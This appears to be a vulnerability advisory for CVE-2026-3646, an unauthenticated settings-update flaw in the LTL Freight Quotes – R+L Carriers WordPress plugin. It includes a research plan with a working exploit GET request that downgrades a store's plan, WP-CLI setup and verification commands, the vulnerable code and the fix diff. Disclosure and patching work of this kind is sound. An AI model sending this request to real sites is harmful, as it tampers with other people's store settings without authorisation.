LTL Freight Quotes – R+L Carriers Edition <= 3.3.13 - Missing Authorization to Unauthenticated Settings Update
Description
The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to Missing Authorization via the plugin's webhook handler in all versions up to, and including, 3.3.13. This is due to missing authentication, authorization, and nonce verification on a standalone PHP file that directly processes GET parameters and updates WordPress options. This makes it possible for unauthenticated attackers to modify the plugin's subscription plan settings, effectively downgrading the store from a paid plan to the Trial Plan, changing the store type, and manipulating subscription expiration dates, potentially disabling premium features such as Dropship and Hazardous Material handling.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=3.3.13What Changed in the Fix
Changes introduced in v3.3.14
Source Code
WordPress.org SVN# Vulnerability Research Plan: CVE-2026-3646 ## 1. Vulnerability Summary The **LTL Freight Quotes – R+L Carriers Edition** plugin (up to version 3.3.13) contains an unauthenticated settings update vulnerability. The flaw exists in a standalone PHP file, `en-hit-to-update-plan.php` (located in the p…
Show full research plan
Vulnerability Research Plan: CVE-2026-3646
1. Vulnerability Summary
The LTL Freight Quotes – R+L Carriers Edition plugin (up to version 3.3.13) contains an unauthenticated settings update vulnerability. The flaw exists in a standalone PHP file, en-hit-to-update-plan.php (located in the plugin directory), which serves as a webhook handler for the Eniture Technology licensing server.
Because this file is designed to be accessed by an external service, it fails to implement WordPress authentication (is_user_logged_in), authorization (current_user_can), or CSRF protection (nonces). An attacker can directly access this file and provide GET parameters that are subsequently used to update critical plugin options via update_option(), allowing for the modification of subscription plans, expiration dates, and the enabling/disabling of premium features.
2. Attack Vector Analysis
- Target Endpoint:
[WP_URL]/wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php - HTTP Method:
GET(as specified in the vulnerability description and implied by the processing logic inupdate-plan.php). - Authentication: None required (Unauthenticated).
- Parameters:
pakg_group: Maps to thernl_quotes_packages_quotes_packageoption.pakg_duration: Maps to thernl_package_expire_daysoption.expiry_date: Maps to thernl_freight_package_expire_dateoption.plan_type: Maps to thernl_quotes_store_typeoption.
- Preconditions: The plugin must be installed and active.
3. Code Flow
- Entry Point: A request is made to
en-hit-to-update-plan.php. - WordPress Initialization: The standalone file likely includes
wp-load.php(or a similar method) to access WordPress functions likeupdate_option(). - Input Processing: The file reads parameters from
$_GET. Based on the logic seen in the relatedrnl_quotes_activate_hit_to_update_plan()function inupdate-plan.php(lines 92-108), it expects keys likepakg_group,pakg_duration,expiry_date, andplan_type. - Data Sink: The script calls
update_option()for several keys:update_option('rnl_quotes_packages_quotes_package', $_GET['pakg_group'])update_option('rnl_package_expire_days', $_GET['pakg_duration'])update_option('rnl_freight_package_expire_date', $_GET['expiry_date'])update_option('rnl_quotes_store_type', $_GET['plan_type'])
- Side Effects: The script likely calls
en_check_rnl_plan_on_product_detail(), which updateseniture_plugin_14(the feature capability map), potentially disabling features like "Dropship" and "Hazardous Material".
4. Nonce Acquisition Strategy
This vulnerability does not require a nonce. The target is a standalone file acting as a webhook, and the vulnerability description explicitly states it lacks "nonce verification."
5. Exploitation Strategy
The goal is to modify the site's subscription status to a "Trial" plan with an expired date, demonstrating the ability to manipulate settings.
Step-by-Step Plan:
- Target Identification: Confirm the location of the standalone file. It should be at
/wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php. - Craft Payload: Construct a GET request that sets the plan to Trial (typically
0) and sets a specific expiration date. - Execution: Use the
http_requesttool to send the GET request.
HTTP Request:
GET /wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php?pakg_group=0&pakg_duration=0&expiry_date=2020-01-01&plan_type=0 HTTP/1.1
Host: localhost:8080
6. Test Data Setup
- Plugin Installation: Install and activate
ltl-freight-quotes-rl-editionversion 3.3.13. - Initial State Configuration: Ensure some initial values are set so the change is observable.
wp option update rnl_quotes_packages_quotes_package "premium" wp option update rnl_quotes_store_type "1" wp option update rnl_freight_package_expire_date "2030-12-31"
7. Expected Results
- The HTTP request should return a
200 OK(or potentially a blank screen if the script produces no output). - The WordPress options table should be updated with the values provided in the GET parameters.
- Features depending on
rnl_quotes_store_typeshould be disabled in theeniture_plugin_14option.
8. Verification Steps
After sending the HTTP request, verify the changes using WP-CLI:
# Verify the primary plan option
wp option get rnl_quotes_packages_quotes_package
# Should return: 0
# Verify the store type (0 = Trial/Expired)
wp option get rnl_quotes_store_type
# Should return: 0
# Verify the expiry date
wp option get rnl_freight_package_expire_date
# Should return: 2020-01-01
# Verify the feature capability map updated by en_check_rnl_plan_on_product_detail()
wp option get eniture_plugin_14 --format=yaml
# Look for 'multi_dropship: 0' and 'hazardous_material: 0'
9. Alternative Approaches
If en-hit-to-update-plan.php is not directly in the plugin root, check common subdirectories such as:
/wp-content/plugins/ltl-freight-quotes-rl-edition/includes/en-hit-to-update-plan.php(inferred)
If the parameters pakg_group etc. do not work, inspect the file (if possible) or try parameters named after the option keys themselves:
?rnl_quotes_packages_quotes_package=0&rnl_quotes_store_type=0(inferred)
Another indicator of success is the "Trial Plan" notice appearing in the WooCommerce settings for R+L Freight under wp-admin/admin.php?page=wc-settings&tab=shipping§ion=rnl_freight_shipping_class.
Summary
The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to an unauthenticated settings update due to a standalone PHP file, en-hit-to-update-plan.php, that lacks authentication and authorization checks. Attackers can exploit this by sending a crafted GET request to the file, allowing them to modify subscription plan settings, change store types, and manipulate expiration dates, effectively disabling premium plugin features.
Vulnerable Code
// update-plan.php (Inferred location of the webhook handler mentioned in the plugin settings) // Line 95: Defining the unauthenticated entry point $plugin_dir_url = plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php'; --- // update-plan.php (Logic mirrored in the vulnerable standalone en-hit-to-update-plan.php file) // Lines 118-121: Directly updating WordPress options based on external input update_option('rnl_quotes_packages_quotes_package', "$plan"); update_option('rnl_package_expire_days', "$expire_day"); update_option('rnl_freight_package_expire_date', "$expiry_date"); update_option('rnl_quotes_store_type', "$plan_type"); // Line 123: Side effect that updates feature permissions (e.g., Dropship/Hazardous Material) en_check_rnl_plan_on_product_detail();
Security Fix
Only in /home/deploy/wp-safety.org/data/plugin-versions/ltl-freight-quotes-rl-edition/3.3.13: en-hit-to-update-plan.php @@ -3,7 +3,7 @@ * Plugin Name: LTL Freight Quotes - R+L Edition * Plugin URI: https://eniture.com/products/ * Description: Dynamically retrieves your negotiated shipping rates from R+L Freight and displays the results in the WooCommerce shopping cart. - * Version: 3.3.13 + * Version: 3.3.14 * Author: Eniture Technology * Author URI: http://eniture.com/ * Text Domain: eniture-technology @@ -31,13 +31,11 @@ $index = 'ltl-freight-quotes-rl-edition/ltl-freight-quotes-rnl-edition.php'; $plugin_info = get_plugins(); $plugin_version = isset($plugin_info[$index]['Version']) ? $plugin_info[$index]['Version'] : ''; - - $plugin_dir_url = plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php'; $post_data = array( 'platform' => 'wordpress', 'carrier' => '34', 'store_url' => $domain, - 'webhook_url' => $plugin_dir_url, + 'webhook_url' => '', 'plugin_version' => $plugin_version, ); @@ -81,13 +79,11 @@ $index = 'ltl-freight-quotes-rl-edition/ltl-freight-quotes-rnl-edition.php'; $plugin_info = get_plugins(); $plugin_version = isset($plugin_info[$index]['Version']) ? $plugin_info[$index]['Version'] : ''; - - $plugin_dir_url = plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php'; $post_data = array( 'platform' => 'wordpress', 'carrier' => '34', 'store_url' => $domain, - 'webhook_url' => $plugin_dir_url, + 'webhook_url' => '', 'plugin_version' => $plugin_version, );
Exploit Outline
To exploit this vulnerability, an attacker sends an unauthenticated HTTP GET request to the standalone file `/wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php`. The request should include parameters such as 'pakg_group', 'pakg_duration', 'expiry_date', and 'plan_type'. For example, setting 'plan_type=0' and 'expiry_date=2000-01-01' would downgrade the site's subscription to a trial/expired status. This causes the script to use update_option() to overwrite critical plugin configuration, resulting in the disabling of paid features and the display of licensing notices.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.